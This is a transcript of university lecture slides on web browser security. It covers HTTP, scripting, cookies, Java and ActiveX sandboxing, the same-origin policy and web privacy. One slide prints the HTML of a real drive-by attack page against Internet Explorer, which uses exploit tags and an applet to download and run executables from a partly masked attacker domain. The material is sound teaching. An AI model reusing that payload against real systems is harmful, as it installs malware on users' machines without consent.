Computer Security CS 426 Lecture 25 - PowerPoint PPT Presentation

1 / 45
About This Presentation
Title:

Computer Security CS 426 Lecture 25

Description:

Affected browsers include Internet Explorer 5.01, 5.5 and 6.0. ... style APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1 ... – PowerPoint PPT presentation

Number of Views:88
Avg rating:3.0/5.0
Slides: 46
Provided by: NINGH7
Category:

less

Transcript and Presenter's Notes

Title: Computer Security CS 426 Lecture 25


1
Computer Security CS 426Lecture 25
  • Web Browser Threats
  • (Most Slides taken from Prof. John Mitchell CS
    155 Slides at Stanford)

2
Browser and Network
Network
request
Browser
Web site
reply
OS
Hardware
  • Browser sends requests
  • May reveal private information (in forms,
    cookies)
  • Browser receives information, code
  • May corrupt state by running unsafe code
  • Interaction susceptible to network attacks
  • Use HTTPS, which uses SSL/TLS

3
Outline
  • Browser review
  • Bugs happen
  • HTTP, scripts, events, DOM
  • Session state and cookies
  • Protecting the browser environment
  • Execution sandbox
  • Access policies, signed scripts
  • Privacy and confidentiality for sensitive
    information
  • Protecting the file system, OS, platform
  • Protecting information associated with other
    browser processes (e.g., other windows)
  • Protecting the user against deception
  • Protecting against traffic analysis

4
Tuesday, February 12, 2002
  • Microsoft Issues New IE Browser Security Patch
    By Richard Karpinski
  • Microsoft has released a security patch that
    closes some major holes in its Internet Explorer
    browser
  • The so-called "cumulative patch" fixes six
    different IE problems ...
  • Affected browsers include Internet Explorer 5.01,
    5.5 and 6.0.
  • Microsoft rated the potential security breaches
    as "critical."

5
Feb 2002 patch addresses
  • A buffer overrun associated with an HTML
    directive ... Hackers could use this breach to
    run malicious code on a user's system.
  • A scripting vulnerability that would let an
    attacker read files on a user's systems.
  • A vulnerability related to the display of file
    names ... Hackers could misrepresent the name
    of a file ... and trick a user into downloading
    an unsafe file.
  • A vulnerability that would allow a Web page to
    improperly invoke an application installed on a
    user's system to open a file on a Web site.
  • more

MS announced 20 vulnerabilities on April 13, 2004
!!!
6
And then again last year,
  • Windows Security Updates Summary for April 2005
  • Published April 12, 2005
  • A security issue has been identified that
    could allow an attacker to compromise a computer
    running Internet Explorer and gain control over
    it. You can help protect your computer by
    installing this update from Microsoft. After you
    install this item, you may have to restart your
    computer.

7
Microsoft Security Bulletin MS06-013, April 2006
8
An Attack Incident Against IE Browser
  • One Click on a malicious URL
  • http//xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html
  • Result

lthtmlgtltheadgtlttitlegtlt/titlegtlt/headgtltbodygt ltstylegt
CURSOR url("http//vxxxxxxe.biz/adverts/033/sp
loit.anr") lt/stylegt ltAPPLET ARCHIVE'count.jar'
CODE'BlackBox.class' WIDTH1 HEIGHT1gt ltPARAM
NAME'url' VALUE'http//vxxxxxxe.biz/adverts/033/
win32.exe'gtlt/APPLETgt ltscriptgt try document.writ
e('ltobject data10911545105116115
58 109104116109108581021051081
0158 //C\fo''o.mht!''http//vxxxx''xxe.biz/
/adv''erts//033//targ.ch' 'm/targ''et.htm
typetext/x-scriptletgtlt/ob''jectgt') catch(e)
lt/scriptgt lt/bodygtlt/htmlgt
MS05-002
MS03-011
MS04-013
9
An Attack Incident Against IE Browser
22 unwanted programs are installed without the
users consent
10
Browser security topics
  • Review HTTP, scripting
  • Controlling outgoing information
  • Cookies
  • Cookie mechanism, JunkBuster
  • Routing privacy
  • Anonymizer,
  • Privacy policy P3P
  • Risks from incoming executable code
  • JavaScript
  • ActiveX
  • Plug-ins
  • Java

11
HyperText Transfer Protocol
HTTP
  • Used to request and return data
  • Methods GET, POST, HEAD,
  • Stateless request/response protocol
  • Each request is independent of previous requests
  • Statelessness has a significant impact on design
    and implementation of applications
  • Evolution
  • HTTP 1.0 simple
  • HTTP 1.1 more complex

12
HTML and Scripting
  • lthtmlgt
  • ltPgt
  • ltscriptgt
  • var num1, num2, sum
  • num1 prompt("Enter first number")
  • num2 prompt("Enter second number")
  • sum parseInt(num1) parseInt(num2)
  • alert("Sum " sum)
  • lt/scriptgt
  • lt/htmlgt

Browser receives content, displays HTML and
executes scripts
13
Events
Mouse event causes page-defined function to be
called
  • ltscript type"text/javascript"gt
  • function whichButton(event)
  • if (event.button1)
  • alert("You clicked the left mouse button!")
  • else
  • alert("You clicked the right mouse button!")
  • lt/scriptgt
  • ltbody onmousedown"whichButton(event)"gt
  • lt/bodygt

Other events onLoad, onMouseMove, onKeyPress,
onUnLoad
14
Document object model (DOM)
  • Object-oriented interface used to read and write
    documents
  • web page in HTML is structured data
  • DOM provides representation of this hierarchy
  • Examples
  • Properties document.alinkColor, document.URL,
    document.forms , document.links ,
    document.anchors
  • Methods document.write(document.referrer)
  • Also Browser Object Model (BOM)
  • Window, Document, Frames, History, Location,
    Navigator (type and version of browser)

15
Need for session state
www.e_buy.com
www.e_buy.com/ shopping.cfm? pID269 item1102030
405
View Catalog
Check out
Select Item
www.e_buy.com/ shopping.cfm? pID269
www.e_buy.com/ checkout.cfm? pID269 item1102030
405
Store session information in URL Easily read on
network
16
Store info across sessions?
  • Cookies
  • A cookie is a file created by an Internet site to
    store information on your computer

Enters form data
Server
Browser
Stores cookie
Requests cookie
Server
Browser
Returns data
Http is stateless protocol cookies add state
17
Cookie
  • A named string stored by the browser
  • Accessible as property of the Document object
  • Can be read and written entirely on client side
    using Javascript

18
Browser runs many forms of mobile code
  • Java applets
  • ActiveX controls
  • Browser helpers
  • Javascripts

19
Security risks posted by mobile code
  • Compromise host
  • Write to file system
  • Interfere with other processes in browser
    environment
  • Steal information
  • Read file system
  • Read information associated with other browser
    processes (e.g., other windows)
  • Fool the user
  • Reveal information through traffic analysis

20
Browser sandbox
  • Sandboxing for security
  • Code executed in browser has only restricted
    access to OS, network, and browser data
    structures
  • Isolation for privacy
  • Similar to OS process isolation, conceptually
  • Browser is a weak OS
  • Same-origin principle
  • Only the site that stores some information in the
    browser may later read or modify that information
    (or depend on it in any way).

21
Java
  • General programming language
  • Web pages may contain Java code
  • Java executed by Java Virtual Machine
  • Special security measures associated with Java
    code from remote URLs
  • Javascript, other security models are based on
    Java security model

22
Java Applet
  • Local window
  • Download
  • Seat map
  • Airline data
  • Local data
  • User profile
  • Credit card
  • Transmission
  • Select seat
  • Encrypted msg

23
Mobile code security mechanisms
  • Examine code before executing
  • Java bytecode verifier performs critical tests
  • Interpret code and trap risky operations
  • Java bytecode interpreter does run-time tests
  • Security manager applies local access policy
  • Security manager policy based on
  • Site that suppplied the code
  • Code signing who signed it?

24
Java Virtual Machine Architecture
A.class
A.java
Java Compiler
Compile source code
Java Virtual Machine
Loader
Network
B.class
Verifier
Linker
Bytecode Interpreter
25
Class loader
  • Runtime system loads classes as needed
  • When class is referenced, loader searches for
    file of compiled bytecode instructions
  • Default loading mechanism can be replaced
  • Define alternate ClassLoader object
  • Extend the abstract ClassLoader class and
    implementation
  • Can obtain bytecode from network
  • VM restricts applet communication to site that
    supplied applet

26
Verifier
  • Bytecode may not come from standard compiler
  • Evil hacker may write dangerous bytecode
  • Verifier checks correctness of bytecode
  • Every instruction must have a valid operation
    code
  • Every branch instruction must branch to the start
    of some other instruction, not middle of
    instruction
  • Every method must have a structurally correct
    signature
  • Every instruction obeys the Java type discipline
  • Last condition is fairly complicated .

27
Type Safety of JVM
  • Load-time type checking
  • Run-time type checking
  • All casts are checked to make sure type safe
  • All array references are checked to be within
    bounds
  • References are tested to be not null before
    dereference
  • Additional features
  • Automatic garbage collection
  • No pointer arithmetic
  • If program accesses memory, the memory is
    allocated to the program and declared with
    correct type

28
Security Manager
  • Java library functions call security manager
  • Security manager object answers at run time
  • Decide if calling code is allowed to do operation
  • Examine protection domain of calling class
  • Signer organization that signed code before
    loading
  • Location URL where the Java classes came from
  • Uses the system policy to decide access
    permission

29
Stack Inspection
  • Permission depends on
  • Permission of calling method
  • Permission of all methods above it on stack
  • Up to method that is trusted and asserts this
    trust
  • Many details omitted

method f
method g
method h
java.io.FileInputStream
30
ActiveX
  • ActiveX controls reside on client's machine,
    activated by HTML object tag on the page
  • ActiveX controls are not interpreted by browser
  • Compiled binaries executed by client OS
  • Controls can be downloaded and installed
  • Security model relies on three components
  • Digital signatures to verify source of binary
  • IE policy can reject controls from network zones
  • Controls marked by author as safe for
    initialization, safe for scripting which affects
    the way control used
  • Once accepted, installed and started, no control
    over execution

31
Installing Controls
If you install and run, no further control over
the code.
In principle, browser/OS could apply sandboxing,
other techniques for containing risks in native
code. But dont count on it.
32
Risks associated with controls
  • MSDN Warning
  • An ActiveX control can be an extremely insecure
    way to provide a feature
  • Why?
  • A COM object, control can do any user action
  • read and write Windows registry
  • access the local file system
  • Other web pages can attack a control
  • Once installed, control can be accessed by any
    page
  • Page only needs to know class identifier (CLSID)
  • Recommendation use other means if possible

http//msdn.microsoft.com/library/default.asp?url
/code/list/ie.asp
33
IE Browser Helper Objects (Extensions)
  • COM components loaded when IE starts up
  • Run in same memory context as the browser
  • Perform any action on IE windows and modules
  • Detect browser events
  • GoBack, GoForward, and DocumentComplete
  • Access browser menu, toolbar and make changes
  • Create windows to display additional information
  • Install hooks to monitor messages and actions
  • Summary No protection from extensions

http//msdn.microsoft.com/library/default.asp?url
/library/en-us/dnwebgen/html/bho.asp
34
JavaScript
  • Executed by browser
  • Used in many attacks (to exploit other
    vulnerabilities)
  • Cookie attack from earlier slide (08 Nov 2001)
  • With the assistance of some JavaScript code,
    an attacker could construct a Web page or
    HTML-based e-mail that could access any cookie in
    the browser's memory or those stored on disk ...
  • JavaScript runs
  • Before the HTML is loaded, before the document is
    viewed
  • While the document is viewed, or as the browser
    is leaving

35
Javascript Security Model
  • Sandbox design (at least conceptually)
  • No direct file access or network access
  • Same-origin policy
  • Can only read properties of documents and windows
    from same place server, protocol, port
  • Access control with signed scripts
  • User can grant privileges to signed scripts
  • UniversalBrowserRead/Write
  • UniversalFileread,
  • UniversalSendMail

Reference http//www.devarticles.com/c/a/JavaScri
pt/JavaScript-Security/
36
Examples, assuming www.example.com
Same-origin check applies to access to window
object of other frames, etc.
37
Problems with S-O Principle
  • Poorly enforced on some browsers
  • Particularly older browsers
  • Limitations if site hosts unrelated pages
  • Example Web server often hosts sites for
    unrelated parties
  • http//www.example.com/account/
  • http//www.example.com/otheraccount/
  • Same-origin policy, allows script on one page to
    access properties of document from another
  • Can be bypassed in Cross-Site-Scripting attacks

38
Browser Cookie Management
  • Cookie Same-origin ownership
  • Once a cookie is saved on your computer, only the
    Web site that created the cookie can read it.
  • Variations
  • Temporary cookies
  • Stored until you quit your browser
  • Persistent cookies
  • Remain until deleted or expire
  • Third-party cookies
  • Originates on or sent to a web site other than
    the one that provided the current page

39
Third-party cookies
  • Get a page from merchant.com
  • Contains ltimg srchttp//doubleclick.com/advt.gifgt
  • Image fetched from DoubleClick.com
  • DoubleClick knows IP address and page you were
    looking at
  • DoubleClick sends back a suitable advertisement
  • Stores a cookie that identifies "you" at
    DoubleClick
  • Next time you get page with a doubleclick.com
    image
  • Your DoubleClick cookie is sent back to
    DoubleClick
  • DoubleClick could maintain the set of sites you
    viewed
  • Send back targeted advertising (and a new cookie)
  • Cooperating sites
  • Can pass information to DoubleClick in URL,

40
Cookie issues
  • Cookies maintain record of your browsing habits
  • Cookie stores information as set of name/value
    pairs
  • May include any information a web site knows
    about you
  • Sites track your activity from multiple visits to
    site
  • Sites can share this information (e.g.,
    DoubleClick)
  • Browser attacks could invade your privacy
  • 08 Nov 2001
  • Users of Microsoft's browser and e-mail
    programs could be vulnerable to having their
    browser cookies stolen or modified due to a new
    security bug in Internet Explorer (IE), the
    company warned today.

41
Preserving web privacy
  • Your IP address may be visible to web sites
  • This may reveal your employer, ISP, etc.
  • Can link activities on different sites, different
    times
  • Can you prevent sites from learning about you?
  • Anonymizer
  • Single site that hides origin of web request

42
Browsing Anonymizers
  • Web Anonymizer hides your IP address
  • What does anonymizer.com know about you?

www.anonymizer.com/ cgi-bin/redirect.cgi?url
Server
Anonymizer
Browser
43
How web sites use your information
  • You may enter information to buy product
  • Name, address, credit card number,
  • How will web site use this information
  • Charge your card and mail your purchase
  • Give sales information to other businesses?
  • Platform for privacy preferences (P3P)
  • Framework for reaching agreement on use of
    personal information
  • Enforcement at server side is another matter

44
A Simple P3P Conversation
  • User agent Get index.html
  • Service Here is my P3P proposal - I collect
    click-stream data and computer information for
    web site and system administration and
    customization of site
  • User agent OK, I accept your proposal
  • Service Here is index.html

45
Coming Attractions
  • November 28
  • Web Application Security
Write a Comment
User Comments (0)
About PowerShow.com